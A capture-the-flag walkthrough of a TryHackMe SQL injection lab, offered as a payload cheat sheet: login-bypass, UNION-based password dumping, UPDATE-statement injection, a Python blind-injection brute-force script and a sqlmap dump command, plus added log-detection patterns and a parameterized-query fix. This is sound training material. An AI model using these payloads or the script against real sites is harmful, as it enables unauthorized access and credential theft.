Description: Understand how SQL injection attacks work and how to exploit this vulnerability.

Tags: security, sqli, sqlmap, web

Difficulty: Easy

Host: TryHackMe | SQL Injection Lab (by Fafa and eXistens) - https://tryhackme.com/room/sqlilab


This is a quick walkthrough and basically a collection of the payloads, to be used as a cheat sheet.

1. Introduction

2. Introduction to SQL Injection: Part 1

2.1 What is the flag for SQL Injection 1: Input Box Non-String?

 1 OR 1=1 -- - 

2.2 What is the flag for SQL Injection 2: Input Box String?

 1' OR '1'='1'-- - 

2.3 What is the flag for SQL Injection 3: URL Injection?

Basic payload:

 [...]/login?profileID=-1' or 1=1-- -&password=a 

Encoded payload:

 [...]/login?profileID=-1%27%20or%201=1--%20-&password=a 
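From the defender's side, the encoded payload above is what actually shows up in a web server access log. The following detector is an added example (not part of the room or this write-up): it URL-decodes the query string of each request line and flags the injection patterns used on this page. The log lines are constructed sample data, and the paths reuse the room's URLs.

```python
import re
from urllib.parse import unquote_plus

# Signatures are matched against the decoded query string (case-insensitive).
SQLI_PATTERNS = [
    r"'\s*or\s+1\s*=\s*1",          # 1' or 1=1 style tautology
    r"union\s+select",               # UNION-based extraction
    r"--\s*-",                       # the "-- -" comment terminator used on this page
    r"sqlite_master|group_concat",   # schema / data dumping helpers
]
SQLI_RE = re.compile("|".join(SQLI_PATTERNS), re.IGNORECASE)

# Combined log format: client, ident, user, [time], "METHOD path PROTO", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if none)."""
    if "?" not in path:
        return ""
    # Decode twice: double-encoded payloads would otherwise slip past the patterns.
    return unquote_plus(unquote_plus(path.split("?", 1)[1]))

def scan_log(lines):
    """Yield (client_ip, path, matched_signature) for suspicious requests."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status = m.groups()
        hit = SQLI_RE.search(decode_query(path))
        if hit:
            yield client, path, hit.group(0)

# Constructed sample access-log lines; the second carries this page's encoded payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login?profileID=10&password=toor HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /login?profileID=-1%27%20or%201=1--%20-&password=a HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /notes?q=%27%20UNION%20SELECT%201,group_concat(password)%20FROM%20users%27 HTTP/1.1" 200 777',
]

if __name__ == "__main__":
    for client, path, sig in scan_log(SAMPLE_LOG):
        print(f"[SQLi?] {client} {path} matched {sig!r}")
```

Only GET requests carry the payload in the path; the POST variants later on this page need request-body logging or a WAF to be seen the same way.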

2.4 What is the flag for SQL Injection 4: POST Injection?

The injection is sent in a POST request.

3. Introduction to SQL Injection: Part 2

3.1 What is the flag for SQL Injection 5: UPDATE Statement?

First I logged in with 10:toor, went to "Edit Profile" and tested for the vulnerability by entering the following data into the "nickName" field.

 asd',nickName='test',email='hacked 

But only "nickName" got updated. Then I entered it into the "email" field and it worked. With the following payload I got the SQLite version number 3.22.0:

 asd',nickName=sqlite_version(),email='hacked 

To dump the table names

 ',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email=' 

The tables are usertable and secrets. To dump the column names of secrets:

 ',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email=' 

Output was
CREATE TABLE secrets ( id integer primary key, author integer not null, secret text not null )

Then I extracted the data with

 ',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email=' 

Alternatively it's possible with:

 ',nickName=(SELECT group_concat(secret) from secrets),email=' 
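The root cause of this task is the UPDATE statement being built from the submitted field values. The following is an added example (not the room's code): the same UPDATE once built with string formatting and once with bound parameters, run against an in-memory SQLite database with constructed rows. The table and column names (users: id, nickName, email) are assumed to mirror the challenge.

```python
import sqlite3

# The email-field payload from this task, quoted verbatim from the write-up.
PAYLOAD = "asd',nickName=sqlite_version(),email='hacked"

def make_db():
    """Constructed sample schema; table/column names assumed to mirror the challenge."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, nickName TEXT, email TEXT)")
    db.execute("INSERT INTO users VALUES (10, 'toor', 'toor@example.com')")
    return db

def update_profile_vulnerable(db, user_id, email):
    # The submitted value is spliced into the statement text: the quote in the
    # payload ends the email literal and the rest is parsed as extra SET clauses.
    # (SQLite keeps only the rightmost assignment when a column is set twice.)
    db.execute(f"UPDATE users SET email='{email}' WHERE id={user_id}")

def update_profile_safe(db, user_id, email):
    # Bound parameters: the value travels separately from the SQL text, so the
    # payload is stored verbatim and never parsed as SQL.
    db.execute("UPDATE users SET email=? WHERE id=?", (email, user_id))

def profile(db, user_id):
    return db.execute("SELECT nickName, email FROM users WHERE id=?", (user_id,)).fetchone()

def demo():
    """Run the same payload through both versions; returns (vulnerable_row, safe_row)."""
    vuln, safe = make_db(), make_db()
    update_profile_vulnerable(vuln, 10, PAYLOAD)
    update_profile_safe(safe, 10, PAYLOAD)
    return profile(vuln, 10), profile(safe, 10)

if __name__ == "__main__":
    v, s = demo()
    print("vulnerable:", v)   # nickName replaced by the SQLite version, email 'hacked'
    print("safe:      ", s)   # nickName untouched, email holds the raw payload string
```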

4. Vulnerable Startup: Broken Authentication

4.1 What is the flag for this challenge?

 ' OR 1=1-- - 

5. Vulnerable Startup: Broken Authentication 2

5.1 What is the flag for this challenge?

I logged in as before with

 ' OR 1=1-- - 

Then, at the login, I found out the number of columns with

 ' UNION SELECT 1,2-- - 

Extracting the passwords from the users table

 ' UNION SELECT 1,group_concat(password) FROM users-- - 

6. Vulnerable Startup: Broken Authentication 3 (Blind Injection)

6.1 What is the flag for this challenge?

Getting the length of the password with

 admin' AND length((SELECT password from users where username='admin'))==37-- - 

Script for blind SQLi.

 #!/usr/bin/python3
 import sys
 import requests
 import string


 def send_p(url, query):
     """Send the injected username to the login form and return the response body."""
     payload = {"username": query, "password": "admin"}
     try:
         r = requests.post(url, data=payload, timeout=3)
     except requests.exceptions.ConnectTimeout:
         print("[!] ConnectionTimeout: Try to adjust the timeout time")
         sys.exit(1)
     return r.text


 def main(addr):
     url = f"http://{addr}/challenge3/login"
     flag = ""
     password_len = 38
     # Not the most efficient way of doing it...
     for i in range(1, password_len):
         for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}":
             # Convert char to hex and remove "0x"
             h = hex(ord(c))[2:]
             query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \
                 f"{i},1)=CAST(X'{h}' AS TEXT)--"
             resp = send_p(url, query)
             # The login page only says "Invalid" when the condition was false
             if "Invalid" not in resp:
                 flag += c
                 print(flag)
     print(f"[+] FLAG: {flag}")


 if __name__ == "__main__":
     if len(sys.argv) == 1:
         print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT")
         sys.exit(0)
     main(sys.argv[1])

Alternative:

 sqlmap -u http://'machine-ip':5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump 

7. Vulnerable Startup: Vulnerable Notes

7.1 What is the flag for this challenge?

Register with

 ' UNION SELECT 1,2' 

and log in. With this, the next exploit becomes visible (screenshot: UNION SELECT user).

Get tables from database with

 ' UNION SELECT 1,group_concat(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'' 

The tables are users and notes. To catch the flag:

 ' UNION SELECT 1,group_concat(password) FROM users' 

8. Vulnerable Startup: Change Password

8.1 What is the flag for this challenge?

Registered and logged in with

 admin'-- - 

I changed the password, and it got changed for the "admin" user. Then I logged out and back in as "admin".

9. Vulnerable Startup: Book Title

9.1 What is the flag for this challenge?

Register, log in and click the link. In the title field:

 ') OR 1=1-- - 

I got output with four columns using the UNION SELECT statement

 ') UNION SELECT NULL,NULL,NULL,NULL-- - 

So I replaced every NULL value with numbers

 ') UNION SELECT 1,2,3,4-- - 

Just to be sure, I checked the backend and its version with

 ') UNION SELECT 1,sqlite_version(),3,4-- - 

and got "3.22.0" as the version number as an output. To get the flag I entered

 ') UNION SELECT 1,group_concat(password),3,4 FROM users-- - 

10. Vulnerable Startup: Book Title 2

10.1 What is the flag for this challenge?

Registered and logged in.

 ' UNION SELECT 'STRING 

That gave no output, as intended. The payload

 ' UNION SELECT '1'-- - 

dumped the first entry. To get the working statement I used the payload from the task

 ' UNION SELECT '-1''UNION SELECT 1,2,3,4-- - 

and edited it to get the flag.

 ' UNION SELECT '-1''UNION SELECT 1,group_concat(password),3,4 FROM users-- - 

11. Thank you!

No. Thank you for creating this awesome room!
